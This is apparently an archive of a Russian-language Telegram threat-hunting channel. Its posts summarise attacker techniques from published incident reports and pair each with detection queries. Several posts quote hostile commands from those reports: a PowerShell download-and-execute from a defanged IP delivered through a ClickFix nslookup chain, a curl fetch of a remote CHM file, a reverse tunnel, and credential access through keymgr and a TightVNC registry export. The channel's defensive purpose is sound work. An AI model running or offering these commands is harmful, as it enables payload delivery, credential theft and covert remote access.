Know Your Adversary
Open in Telegram
1 556
Subscribers
+124 hours
-17 days
+430 days
Posts Archive
1 557
Всем привет!
Сегодня мы взглянем на креативную реализацию крайне популярной техники - Spearphishing Link (T1566.002).
Согласно этому исследованию, в феврале 2026 года кластер TA416 распространял фишинговые письма со ссылками, которые вели на Google Drive или скомпрометированные инстансы SharePoint. По ссылкам размещались архивы, которые содержали переименованный исполняемый файл MSBuild (например, в Invitation_Letter_No.02_2026) и файл проекта CSPROJ, который и выполнялся после запуска - MSBuild по умолчанию ищет соответствующий файл в текущей директории.
Успешный запуск приводил к загрузке трех файлов, которые впоследствии использовались для реализации техники DLL-Sideloading.
Несмотря на креативный подход злоумышленников, обнаружить подобное злоупотребление MSBuild довольно просто, например:
event_type: "processcreatewin" AND proc_file_originalfilename: "msbuild.exe" AND NOT proc_file_path: "msbuild.exe"Скоро увидимся! English version
1 557
Всем привет!
Если вы не смогли посетить конференцию, но хотели послушать мой доклад, появилась запись!
1 557
Всем привет!
Сегодня мы с вами поговорим о сборе данных со скомпрометированных систем, и посмотрим на пример техники Archive Collected Data: Archive via Utility (T1560.001).
Источником же примера послужит отчет Microsoft Threat Intelligence об активности кластера Storm-1175, связанного с распространением программы-вымогателя Medusa. Несмотря на то, что злоумышленник использовали в том числе 0-day уязвимости для получения первоначального доступа, основная масса их тактик, техник и процедур была довольно тривиальна.
Тем не менее, один из инструментов привлек мое внимание. Для сбора данных с целью последующей публикации на DLS, атакующие использовали Bandizip - легитимный инструмент для архивации файлов.
Данный инструмент встречается не так часто, и вполне подходит для проактивного поиска, например:
event_type: "processcreatewin" AND proc_file_productname: "bandizip"Скоро увидимся! English version
1 557
Всем привет!
Уверен, вы уже устали читать про Threat Hunting. Самое время начать им заниматься! Именно об этом мы с вами и поговорим уже совсем скоро на конференции R-Evolution, регистрируйтесь и приходите!
Скоро увидимся!
1 557
Всем привет!
Сегодня мы в очередной раз поговорим о технике Bypass User Account Control (T1548.002), и рассмотрим интересный вариант ее реализации.
И поможет нам в этом отчет об операции "TrueChaos". На одном из этапов жизненного цикла кибератаки злоумышленники изменили переменную PATH текущего пользователя:
reg add "hkcu\environment" /v path /t REG_SZ /d "C:\users\<redacted>\appdata\local\temp" /f
После этого атакующие запустили легитимный инструментом Microsoft iSCSI Initiator Control Panel (iscsicpl.exe), который использовался для обхода контроля учетных записей и DLL Hijacking. А вредоносная iscsiexe.dll помещалась злоумышленниками как раз в том самом расположении, которое было записано в реестр на предыдущем шаге.
В данном случае мы, например, можем поохотиться за добавлением подозрительных значений в соотвествующий раздел реестра:
event_type: "registryvaluesetwin" AND reg_key_path: "environment\\path" AND reg_value_data: "appdata\\local\\temp"Вы также можете поискать события загрузки DLL в
iscsicpl.exe из подозрительных расположений, например:
event_type: "imageloadwin" AND proc_file_path: "iscsicpl.exe" AND file_path: "temp"Скоро увидимся! English version
1 557
Всем привет!
Очередной день - очередной Dead Drop Resolver (T1102.001). И в этот раз эксплуатируемые веб-сервисы еще интереснее, чем обычно.
Согласно исследованию Solar о MaskGram Stealer, помимо уже полюбившимся атакующим Steam и Telegram, злоумышленники также использовали Spotify и Chess.com.
Как и прежде, стоит обращать внимание на коммуникации с легитимными веб-сервисами, которыми пользуются атакующие в рамках данной техники, и выделять нетипичные процессы:
event_type: "dnsreqwin"
AND
dns_rname: ("spotify.com" OR "chess.com")
AND NOT
proc_file_path: (your_exclusion_list)
Скоро увидимся!
English version1 557
Всем привет!
Сегодня мы разберем несколько техник из отчета об атаках Warlock, которые привлекли мое внимание.
Итак, первая техника - Windows Credential Manager (T1555.004). Злоумышленники использовали следующую команду, чтобы получить доступ к сохраненным паролям:
C:\Windows\System32\rundll32.exe keymgr.dll,KRShowKeyMgr
Подобный поведенческий маркер встречается не так часто, поэтому вполне подойдет для поиска:
event_type: "processcreatewin"
AND
proc_file_path: "rundll32.exe"
AND
cmdline: ("keymgr.dll" AND "KRShowKeyMgr")
Следующая техника - PowerShell (T1059.001). В этот раз атакующие злоупотребляли им для включения PowerShell Remoting:
C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe "Enable-PSRemoting -Force -SkipNetworkProfileCheck"
Такое поведение хоть и может быть легитимным, является достойной целью для проактивного поиска:
event_type: "processcreatewin" AND proc_file_path: "powershell.exe" AND cmdline: "Enable-PSRemoting"Также стоит отметить использование очередного инструмента с открытым исходным кодом для туннелирования (Protocol Tunneling (T1572)) - Yuze:
rundll32 yuze.dll,RunYuze reverse -c 198[.]13[.]158[.]193:80В данном случае мы также можем поохотиться за соотвествующими параметрами командной строки:
event_type: "processcreatewin"
AND
cmdline: ("reverse" AND "c")
А какие из описанных техник вам показались интересными?
Скоро увидимся!
English version1 557
Repost from Киберболоид
Эволюция ClickFix – массовая угроза в мире социальной инженерии
Если первые зловреды ClickFix были нацелены на Windows, то теперь исследователи фиксируют варианты специально для macOS. Жертва запускает Terminal, вставляет скопированную с веб-страницы команду и получает «подарок» – вредоносное ПО для кражи данных. Например, Atomic macOS Stealer, способный похищать учётные данные браузера, cookies и данные криптовалютных кошельков.
➡️Что ещё важно знать о ClickFix и как защититься? Об этом в интервью «Киберболоиду» рассказал руководитель BI.ZONE Threat Intelligence Олег Скулкин.
#киберболоид #мастерская
1 557
Всем привет!
Сегодня мы рассмотрим ещё один интересный пример использования следующей техники: Remote Access Tools (T1219).
Просматривая отчёт о модус операнди Handala Hack, я заметил интересный инструмент, которым злоупотребляли злоумышленники. Речь идёт о NetBird.
Атакующие использовали его, чтобы получать доступ к хостам, которые не были напрямую доступны извне сети. У этого инструмента нет обнаружений на VirusTotal, и он может быть хорошей целью для проактивного поиска, например:
event_type: "processcreatewin" AND proc_file_productname: "netbird"Скоро увидимся! English version
1 557
Всем привет!
Сегодня мы в очередной раз поговорим о реестре Windows, и посмотрим на пример реализации техники Unsecured Credentials: Credentials in Registry (T1552.002).
Листая отчет о расследовании кибератак CL-UNK-1068 в Южной, Юго-Восточной и Восточной Азии, я в очередной раз увидел, что злоумышленники активно злоупотребляли
reg.exe. При этом, они активно использовали параметр export, например:
reg export "HKEY_USERS\[%SID%]\SOFTWARE\TightVNC\Server" reg export HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TightVNC\Server reg export HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\ServerВ данном случае злоумышленник экспортирует конфигурацию TightVNC из реестра, чтобы получить учетные данные. Для обнаружения мы можем использовать как конкретные разделы реестра, содержащие чувствительные данные, так и проактивно поискать подозрительные события экспорта:
event_type: "processcreatewin" AND proc_file_path: "reg.exe" AND cmdline: "export"Скоро увидимся! English version
1 557
Всем привет!
Иногда, даже если жертва запустила вредоносный файл, компрометация системы может не наступить. И виной этому применение техники System Location Discovery: System Language Discovery (T1614.001).
Дело в том, что в некоторых случаях злоумышленники не хотят, чтобы их ВПО запускалось в системах, расположенных в определенных странах. Сегодня мы посмотрим на пример того, как атакующие ограничивают загрузку стилера для систем, потенциально расположенных в СНГ.
Итак, загрузчик стилера SHub, ориентированного на macOS, использовал следующую команду, чтобы получить информацию о языке скомпрометированной системы:
defaults read ~/Library/Preferences/com.apple.HIToolbox.plist AppleEnabledInputSources 2>/dev/null | grep -qi russian
Ключ AppleEnabledInputSources в файле com.apple.HIToolbox.plist содержит информацию о раскладках клавиатуры, содержимое которого и преряется на наличие русского языка, характерного для СНГ.
Хорошей возможностью обнаружения являются подозрительные события чтения данного ключа, например:
event_type: "processcreatemac"
AND
proc_file_path: "defaults"
AND
cmdline: ("read" AND "appleenabledinputsources")
Скоро увидимся!
English version1 557
Всем привет!
Сегодня мы с вами взглянем на не самую популярную технику. Тем не менее, время от времени она появляется в арсенале атакующих. И это System Binary Proxy Execution: Compiled HTML File (T1218.001).
Зачастую данная техника используется на начальных этапах жизненного цикла кибератаки. Например, злоумышленники могут распространять вредоносные файлы CHM в архивах в качестве вложений в фишинговые письма. Давайте взглянем на пример. В данном случае атакующие использовали архив с ярлыком, который содержал следующую команду:
"C:\Windows\System32\rundll32.exe" shell32.dll ShellExec_RunDLL conhost --headless cmd /c curl www.360printsol[.]com/2026/alfadhalah/thumbnail?img=index.png -L""skontv&hh -d""ecompile^ . nt""v&0.ln""kВ данном случае файл CHM загружается с удаленного веб-ресурса и распаковывается с помощью Windows HTML Help (
hh.exe), при этом, используется аргумент -decompile.
В контексте проактивного поиска угроз мы можем искать как события подозрительного запуска hh.exe как с использованием, так и без использования аргумента -decompile, например:
event_type: "processcreatewin" AND proc_file_path: "hh.exe" AND cmdline: "decompile"Скоро увидимся! English version
1 557
Всем привет!
Сегодня мы поговорим о еще одном легитимном сервисе, которым злоупотребляют атакующие, в данном случае APT37. И, разумеется, разберемся, как пользоваться этой информацией для проактивного поиска.
Итак, в одной из достаточно свежих кампаний APT37 (мы отслеживаем данный кластер как Squid Werewolf) использовали имплант RESTLEAF, который злоупотреблял Zoho WorkDrive - облачной платформой управления файлами и совместной работы.
С точки зрения проактивного поиска, мы можем идентифицировать все сетевые коммуникации, относящиеся к Zoho WorkDrive, после чего отделить события, являющиеся легитимными:
event_type: "dnsreqwin" AND dns_rname: "workdrive.zohoexternal.com"Скоро увидимся! English version
1 557
Всем привет!
Кажется, тренд действительно подтверждается: еще один легитимный инструмент для мониторинга сотрудников попал в арсенал злоумышленников.
Malwarebytes рассказали о кампании, в рамках которой атакующие маскируют инсталляторы Teramind под обновления Zoom и Google Meet.
Teramind - это программная платформа для мониторинга сотрудников и анализа их активности на рабочем месте. Она помогает компаниям отслеживать и анализировать действия пользователей на компьютерах и в сети для повышения безопасности, продуктивности и соблюдения корпоративных правил.
Тем не менее, злоумышленники могут использовать подобное программное обеспечение для несанкционированного доступа к корпоративным системам.
Во-первых, мы можем поискать события, связанные с запускам файлов, подписанных
Teramind Inc., например:
event_type: "processcreatewin" AND proc_file_sig: "teramind"Также можно взглянуть на подозрительные коммуникации с
teramind[.]co:
event_type: "dnsreqwin" AND dns_rname: "teramind.co"Скоро увидимся! English version
1 557
Всем привет!
Я продолжаю работать над серией материалов, посвященных практическому применению киберразведданных и внедрению угрозоцентричного подхода. В этот раз поговорим о том, как предотвращать кибератаки, используя информацию об инфраструктуре атакующих.
Скоро увидимся!
1 557
Всем привет!
Последние несколько лет меня очень интересовал Purple Teaming. Собственно, пришло время поделиться накопленным опытом! Вместе с Владом и нашими друзьями из Inseca мы разработали шестинедельный курс по данному направлению.
О чем поговорим в рамках курса:
- Что такое Purple Teaming и почему вам стоит им заниматься?
- Как подготовиться к киберучениям в подобном формате и как сделать их процессом?
- Что такое эмуляция атакующих, где брать данные для нее, и как с ними работать?
- Как разрабатывать детектирующую логику и когда этим следует заниматься?
- Что такое Threat Hunting, когда и кому он нужен?
- Как проводить киберучения и как автоматизировать этот процесс?
Курс начнется 13 марта, если вам он интересен, у вас еще есть время записаться! Для читателей, разумеется, бонус - скидка 10% по промокоду
knowyouradversary!
Скоро увидимся!1 557
Всем привет!
Думаю, все привыкли, что атакующие активно злоупотребляют средствами удаленного управления, но, кажется, вырисовывается новый тренд - злоупотребление инструментами для мониторинга сотрудников.
Мы уже видели, как атакующие использовали Controlio и Mipko Employee Monitor, а в свежем отчете Huntress указывается, что вымогатели добавили в свой арсенал еще один похожий инструмент - Network LookOut Net Monitor for Employees.
Что поискать? Например, подозрительное взаимодействие с
networklookout[.]com:
event_type: "dnsreqwin" AND dns_rname: "networklookout.com"Ну и, разумеется, события запуска процессов, метаданные которых указывают на данный инструмент, например:
event_type: "processcreatewin" AND proc_file_productname: "Net Monitor for Employees Pro"Скоро увидимся! English version
1 557
Всем привет!
Варианты техники Malicious Copy and Paste (T1204.004) не прекращают пользоваться популярностью у злоумышленников. Сегодня мы посмотрим на очередной из них, и разберемся, действительно ли он влияет на наши возможности обнаружения.
Данным вариантом поделились исследователи Microsoft Threat Intelligence. Команда, которую предлагают выполнить жертве, выполняет DNS-запрос к подконтрольному злоумышленникам серверу, и парсит поле 'Name:' ответа:
cmd /c "nslookup example.com 84.21.189[.]20 | findstr "^Name:" | for /f "tokens=1,* delims=:" %a in ('more') do @echo %b" | cmd && exit\1
Несмотря на оригинальность подхода, в поле 'Name:' хранится довольно банальная команда:
powershell.exe -ep bypass -w h -c "iwr hxxp://64.227.40[.]197/o -useb | iex"
Как видите, здесь нет ничего оригинального, а поискать подобную активность можно, например, так:
event_type: "processcreatewin"
AND
proc_file_path: "powershell.exe"
AND
cmdline: ("iwr" AND "iex")
Скоро увидимся!
English version1 557
Всем привет!
Сегодня мы посмотрим на технику Service Stop (T1489), и разберемся, стоит ли охотиться за ее реализацией.
Данная техника - типичный поведенческий маркер для программ-вымогателей и вайперов. Если вы загляните в ATT&CK, то увидите массу примеров. Обычно, такие программы используются в самом конце жизненного цикла кибератаки, и едва ли являются целями для проактивного поиска.
Но, разумеется, бывают и исключения. Давайте взглянем на ботнет Prometei. В процессе инсталляции ВПО останавливает службу WinRM, а после отключает ее:
sc stop WinRM
sc config WinRM start= disabled
Зачем это нужно? Это,например, затруднит удаленное администрирование. Может ли такая активность быть легитимной? Конечно! Следовательно, это такой поведенческий маркер - неплохая цель для проактивного поиска:
event_type: "processcreatewin"
AND
proc_file_path: "sc.exe"
AND
cmdline: ("winrm" AND "disabled")
Скоро увидимся!
English version